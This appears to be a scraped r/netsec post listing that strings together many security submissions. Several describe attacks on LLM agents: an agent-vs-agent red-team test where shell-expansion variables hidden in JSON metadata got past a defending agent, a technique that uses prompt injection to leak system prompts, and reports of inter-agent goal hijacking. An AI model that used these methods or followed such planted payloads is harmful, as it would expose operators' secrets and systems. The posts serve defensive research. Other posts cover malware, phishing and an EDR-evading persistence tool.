Questions regarding netsec and discussion related directly to netsec are welcome here, as is sharing tool links.
As always, the content & discussion guidelines should also be observed on r/netsec.
Feedback and suggestions are welcome, but don't post it here. Please send it to the moderator inbox.
We recently ran a controlled adversarial security test between two autonomous AI agents built on OpenClaw.
One agent was explicitly configured as a red-team attacker.
One agent acted as a standard defensive agent.
Once the session started, there were no humans in the loop. The agents communicated directly over webhooks with real tooling access.
The goal was to test three failure dimensions that tend to break autonomous systems in practice: access, exposure, and agency.
The attacker first attempted classic social engineering by offering a “helpful” security pipeline that hid a remote code execution payload and requested credentials. The defending agent correctly identified the intent and blocked execution.
After that failed, the attacker pivoted to an indirect attack. Instead of asking the agent to run code, it asked the agent to review a JSON document with hidden shell expansion variables embedded in metadata. This payload was delivered successfully and is still under analysis.
The main takeaway so far is that direct attacks are easier to defend against. Indirect execution paths through documents, templates, and memory are much harder.
This work is not a claim of safety. It is an observability exercise meant to surface real failure modes as agent-to-agent interaction becomes more common.
Happy to answer technical questions about the setup or methodology.
Investigated a group evolving from IRC wars to destructive Android malware.
Highlights:
modem/bootloader via dd in custom ROMs.getattr/eval in Python.Hello!
My name is Bogdan Mihai, I'm 21 yr old from Romania , I am a cybersecurity researcher and I'm new to this group. I don't know how many BGP experts are here, but I have a question for them if there are any. I recently invented something a little more abstract for BGP security, and I'm almost sure that there is nothing similar.
I wasn't inspired by anything when I created this, it was a purely random idea that came to my mind. I'm not even an expert in this field, but from the beginning I saw security from a different angle than the others.
I made a tool that basically builds a map of risk areas globally, areas where if someone were to try a hijacking attack, that attack would be successful. This idea came to me when I realized that BGP security is still a big problem.
RPKI adoption is still slow. And the problem is that today's security in BGP is more reactive, it comes into play only after the attack is detected and damage is done.
So I leave you here the link to the zenodo site where I posted my invention. https://zenodo.org/records/18421580 DOI:https://doi.org/10.5281/zenodo.18421580
What I ask of you, and extremely important, is not to analyze every file there, but at least the product overview to understand the idea and tell me who this would be useful to, which company or organization. I know that maybe not everything is perfect there , and maybe there are mistakes I'm no expert, but I want to know if this idea really has value.
I'm very confused and sad because I worked on this but I don't know who it would be of value to or if it even has any value. I appreciate every opinion.
Writeup on a defensive technique for constraining LLM agent database access:
Interested in feedback on the threat model. Code is open source.
I built a small service to track newly published CVEs and send email alerts based on vendor, product, and severity.
It started as an internal tool and is now running in production and usable.
Feedback welcome.
Hi all,
I built a tool for securely sharing credentials instead of pasting them into chat, email, or tickets. I’d like technical feedback on the threat model, protocol, and cryptography.
Key properties:
What I’m NOT claiming:
Live app: https://sharemylogin.com
I’d love:
Thanks in advance!
Sharing some practical experience evaluating G-CTR-like guarantees from a security perspective.
When adversaries adapt, several assumptions behind the guarantees degrade faster than expected. In particular:
- threat models get implicitly frozen
- test-time confidence doesn’t transfer to live systems
- some failures are invisible until exploited
Curious if others in netsec have seen similar gaps between formal assurance and operational reality.
So many of your favorite childhood games are open source now, and bugs fall out of them if you just glance in the right spots.
I had an idea for leaking a system prompt against a LLM powered classifying system that is constrained to give static responses. The attacker uses a prompt injection to update the response logic and signal true/false responses to attacker prompts. I haven't seen other research on this technique so I'm calling it blind boolean-based prompt injection (BBPI) unless anyone can share research that predates it. There is an accompanying GitHub link in the post if you want to experiment with it locally.
We've been running inference-time threat detection across 38 production AI agent deployments. Here's what Week 3 of 2026 looked like with on-device detections.
Key Findings
Attack Technique Breakdown
The inter-agent attack vector is particularly concerning given the MCP ecosystem growth. We're seeing goal hijacking, constraint removal, and recursive propagation attempts.
Full report with methodology: https://raxe.ai/threat-intelligence
Github: https://github.com/raxe-ai/raxe-ce is free for the community to use
Happy to answer questions about detection approaches
Dropping a link to our blog post about our tool Swarmer, a windows persistence tool for abusing mandatory user profiles. Essentially you copy the current user's registry hive and modify it to add a new registry key to run on startup. Because the new hive isn't loaded until the next time the user logs in, EDR never sees any actual registry writes.
AI coding tools figured out that AST-level understanding isn't enough. Copilot, Cursor, and others use semantic indexing through IDE integrations or GitHub's stack graphs because they precise accurate code navigation across files.
Most AI security tools haven't made the same shift. They feed LLMs ASTs or taint traces and expect them to find broken access control. But a missing authorization check doesn't show up in a taint trace because there's nothing to trace.
Team82 uncovered a new vulnerability in the IDIS Cloud Manager (ICM) viewer; an attacker could develop an exploit whereby if a user clicks on an untrusted link, the attack would execute on the machine hosting the ICM Viewer.
I've been auditing hypervisor kernel security in several regulated environments recently, focusing on post-compromise survivability rather than initial breach prevention.
One pattern keeps showing up: most hardening guidance focuses on management planes and guest OSes, but real-world escape chains increasingly pivot through the host kernel (Ring 0).
From recent CVEs (ESXi heap overflows, vmx_exit handler bugs, etc.), three primitives appear consistently in successful guest → host escapes:
Unsigned drivers / DKOM
If an attacker can load a third-party module, they often bypass scheduler controls entirely. Many environments still relax signature enforcement for compatibility with legacy agents, which effectively enables kernel write primitives.
Memory corruption vs. KASLR
KASLR is widely relied on, but without strict kernel lockdown, leaking the kernel base address is often trivial via side channels. Once offsets are known, KASLR loses most of its defensive value.
Kernel write primitives
HVCI/VBS or equivalent kernel integrity enforcement introduces measurable performance overhead (we saw ~12–18% CPU impact in some workloads), but appears to be one of the few effective controls against kernel write primitives once shared memory is compromised.
I’m curious what others are seeing in production:
Looking to compare field experiences rather than promote any particular stack.
Multiple critical flaws (20 CVEs!) in dormakaba physical access control system exos 9300 & access manager & registration unit (pin pad) allow attackers with network access to open arbitrary doors, reconfigure connected controllers and peripherals without prior authentication, and much more. Seems some systems are also reachable over the internet due to misconfigurations.
"According to the manufacturer, several thousand customers were affected, a small proportion of whom operate in environments with high security requirements" (critical infrastructure).
Overview
If you have open positions at your company for information security professionals and would like to hire from the /r/netsec user base, please leave a comment detailing any open job listings at your company.
We would also like to encourage you to post internship positions as well. Many of our readers are currently in school or are just finishing their education.
Please reserve top level comments for those posting open positions.
Rules & Guidelines
Include the company name in the post. If you want to be topsykret, go recruit elsewhere. Include the geographic location of the position along with the availability of relocation assistance or remote work.
You can see an example of acceptable posts by perusing past hiring threads.
Feedback
Feedback and suggestions are welcome, but please don't hijack this thread (use moderator mail instead.)
Your proprietary code is flowing into Frontier AI models in the Cloud undetected. Husn Canaries allow you to receive instant alerts when Claude, ChatGPT, Copilot, Gemini, or any AI coding assistant analyzes your code. Know exactly when your intellectual property is exposed, whether by your team, contractors, or attackers.
It's shown that the LLM (Specially agentic systems) can be used as an attack surface to perform vast number of attacks.
If the agent have access to terminal (Nearly all Coding tools have access to it), an attacker can use it for RCE. If it have access to the database, the attacker can retrieve/alter data.
Technical article examining common DNS/email authentication misinterpretations (DMARC, SPF, DKIM), with real-world examples from large operators and government domains.
I believe Y2K38 isn’t a future problem, it’s exploitable today in any vulnerable system synchronizing time in a way that can be exploitable by an attacker.
Bitsight published an overview of the Year 2038 problem and its security impact: https://www.bitsight.com/blog/what-is-y2k38-problem (Full disclosure: I’m the author)
Many 32-bit systems accept externally influenced time (NTP, GPS, RTC sync, management APIs).
Forcing time near / past the overflow boundary can break authentication, cert validation, logging, TTLs, replay protection.
Embedded / OT / IoT devices are especially exposed:
Long-lived, rarely patched 32-bit Linux / RTOS is common Often internet-reachable Failures range from silent logic errors to crashes.
This makes Y2K38 less a “future date bug” and more a latent vulnerability class affecting real systems today.
I'm interested in how others are:
Treating this issue. Have you heard about it before? Are you (or did you) testing for Y2K38 exposure, in your code and in your installed infrastructure and its dependencies? How do you treat time handling in threat models for embedded / OT environments / critical infrastructure?
If you are interested in time security and want to know more or share your experiences, there is. Time Security SIG over at FIRST that you can consider joining.
Hey everyone,
I’m an independent developer and for the past few months I’ve been working on a tool called Syd. Before I invest more time and money into it, I’m trying to get honest feedback from people who actually work in security.
Syd is a fully local, offline AI assistant for penetration testing and security analysis. The easiest way to explain it is “ChatGPT for pentesting”, but with some important differences. All data stays on your machine, there are no cloud calls or APIs involved, and it’s built specifically around security tooling and workflows rather than being a general-purpose chatbot. The whole point is being able to analyse client data that simply cannot leave the network.
Right now Syd works with BloodHound, Nmap, and I’m close to finishing Volatility 3 support.
With BloodHound, you upload the JSON export and Syd parses it into a large set of structured facts automatically. You can then ask questions in plain English like what the shortest path to Domain Admin is, which users have DCSync rights, or which computers have unconstrained delegation. The answers are based directly on the data and include actual paths, users, and attack chains rather than generic explanations.
With Nmap, you upload the XML output and Syd analyses services, versions, exposed attack surface and misconfigurations. You can ask things like what the most critical issues are, which Windows servers expose SMB, or which hosts are running outdated SSH. The output is prioritised and includes CVE context and realistic next steps.
I’m currently finishing off Volatility 3 integration. The idea here is one-click memory analysis using a fixed set of plugins depending on the OS. You can then ask practical questions such as whether there are signs of malware, what processes look suspicious, or what network connections existed. It’s not trying to replace DFIR tooling, just make memory analysis more approachable and faster to reason about.
The value, as I see it, differs slightly depending on who you are. For consultants, it means analysing client data without uploading anything to third-party AI services, speeding up report writing, and giving junior testers a way to ask “why is this vulnerable?” without constantly interrupting seniors. For red teams, it helps quickly identify attack paths during engagements and works in restricted or air-gapped environments with no concerns about data being reused for training. For blue teams, it helps with triage and investigation by allowing natural language questions over logs and memory without needing to be an expert in every tool.
One thing I’ve been careful about is hallucination. Syd has a validation layer that blocks answers if they reference data that doesn’t exist in the input. If it tries to invent IPs, PIDs, users, or hosts, the response is rejected with an explanation. I’m trying to avoid the confident-but-wrong problem as much as possible.
I’m also considering adding support for other tools, but only if there’s real demand. Things like Burp Suite exports, Nuclei scans, Nessus or OpenVAS reports, WPScan, SQLMap, Metasploit workspaces, and possibly C2 logs. I don’t want to bolt everything on just for the sake of it.
The reason I’m posting here is that I genuinely need validation. I’ve been working on this solo for months with no sales and very little interest, and I’m at a crossroads. I need to know whether people would actually use something like this in real workflows, which tools would matter most to integrate next, and whether anyone would realistically pay for it. I’m also unsure what pricing model would even make sense, whether that’s one-time, subscription, or free for personal use with paid commercial licensing.
Technically, it runs on Windows, macOS and Linux. It uses a local Qwen 2.5 14B model, runs as a Python desktop app, has zero telemetry and no network dependencies. Sixteen gigabytes of RAM is recommended and a GPU helps but isn’t required.
I can share screenshots or record a walkthrough showing real BloodHound and Nmap workflows if there’s interest.
I’ll be honest, this has been a grind. I believe in the idea of a privacy-first, local assistant for security work, but I need to know if there’s actually a market for it or if the industry is happy using cloud AI tools despite the data risks, sticking to fully manual analysis, or relying on scripts and frameworks without LLMs.
Syd is not an automated scanner, not a cloud SaaS, not a ChatGPT wrapper, and not an attempt to replace pentesters. It’s meant to be an assistant, nothing more.
If this sounds useful, I’m happy to share a demo or collaborate with others. I’d really appreciate any honest feedback, positive or negative.
Thanks for reading.
https://www.youtube.com/@SydSecurity
[info@sydsec.co.uk](mailto:info@sydsec.co.uk)
This dataset contains information on what technologies were found on domains during a web crawl in December 2025. The technologies were fingerprinted by what was detected in the HTTP responses.
A few common use cases for this type of data
The 67K domain dataset can be found here: https://www.dropbox.com/scl/fi/d4l0gby5b5wqxn52k556z/sample_dec_2025.zip?rlkey=zfqwxtyh4j0ki2acxv014ibnr&e=1&st=xdcahaqm&dl=0
Preview for what's here: https://pastebin.com/9zXxZRiz
The full 5M+ domains can be purchased for 99 USD at: https://versiondb.io/
VersionDB's WordPress catalogue can be found here: https://versiondb.io/technologies/wordpress/
Enjoy!
Regulatory disclosure filed with the Maine Attorney General describing a third-party identity verification system breach.
From misconfigured cloud environments to wormable crypto-miners; how vulnerable “test” and “demo” environments turned into an entry point to leading security vendors’ and fortune 500 companies.
I analyzed a set of phishing pages impersonating PNB MetLife Insurance that steal user details and redirect victims into fraudulent UPI payments.
The pages are mobile first and appear designed for SMS delivery. Victims are asked for basic policy details, which are exfiltrated via Telegram bots, and then pushed into UPI payment flows using dynamically generated QR codes and deep links to PhonePe/Paytm. A second variant escalates to full bank and debit-card detail harvesting.